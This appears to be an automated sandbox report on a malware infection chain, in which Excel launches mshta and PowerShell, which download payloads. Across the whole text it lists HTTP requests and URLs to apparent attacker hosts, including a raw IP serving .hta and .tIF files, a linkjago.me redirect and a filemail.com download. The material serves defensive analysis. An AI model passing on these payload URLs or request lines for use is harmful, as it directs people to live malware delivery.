              Source: global trafficHTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 146.70.113.200
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Code function: 8_2_000007FE899D7018 URLDownloadToFileW,8_2_000007FE899D7018
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf
              Source: global traffic
              HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: linkjago.me
                Connection: Keep-Alive
              Source: global traffic
              HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                Host: 1016.filemail.com
                Connection: Keep-Alive
              Source: global traffic
              HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1
                Host: 146.70.113.200
                Connection: Keep-Alive
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global traffic
              DNS traffic detected: DNS query: linkjago.me
              Source: global traffic
              DNS traffic detected: DNS query: 1016.filemail.com
              Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/
              Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200//
              Source: mshta.exe, 0000000F.00000003.477431887.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
              Source: mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...
              Source: mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24
              Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC
              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:
              Source: mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ
              Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX
              Source: mshta.exe, 00000004.00000002.428991185.0000000000215000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes
              Source: mshta.exe, 00000004.00000003.422140818.0000000000246000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.0000000000234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM
              Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span
              Source: mshta.exe, 00000004.00000002.428991185.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423819561.000000000027A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl
              Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0
              Source: mshta.exe, 00000004.00000003.424465133.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477594766.0000000002BB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt
              Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethe
              Source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.490184350.000000001ABAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
              Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.450756599.000000001A782000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
              Source: powershell.exe, 00000008.00000002.448366945.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 0000000D.00000002.507185245.00000000022C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com
              Source: powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/
